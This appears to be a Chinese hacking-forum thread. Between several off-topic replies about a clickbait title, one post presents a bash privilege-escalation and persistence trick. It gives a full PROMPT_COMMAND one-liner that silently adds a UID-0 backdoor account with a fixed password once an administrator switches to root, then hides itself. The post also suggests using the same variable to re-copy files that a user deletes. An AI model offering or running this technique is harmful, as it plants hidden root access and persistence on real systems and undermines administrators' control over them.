最近看过此主题的会员

返回列表 发帖
最牛有多牛

TOP

?。。。日 什么也没有 标题党

TOP

啊,没钱呀。我还是给你定期来了
我一直在努力

TOP

?。。。日 什么也没有 标题党
米的暗部 发表于 2010-11-9 22:22


  是有点标题党了,不过你说的什么也没有?

  奇怪了

TOP

~~~{:2_38:}~~~~
杨过是额师傅.........

TOP

利用BASH提权
要利用成功的话,还得看管理员的习惯,这个技巧要比

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"
随后你用su变成root,看看是否多了个用户呢
var im_d0a7aa84be1ce2b17729b900953bb02b = "";


也可以建立用户删除不了的文件比如,用户想删除某个,你在prompt_command里面加入cp命令,每次他执行完del都会又cp一个过去

具体怎么应用看你自己了


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表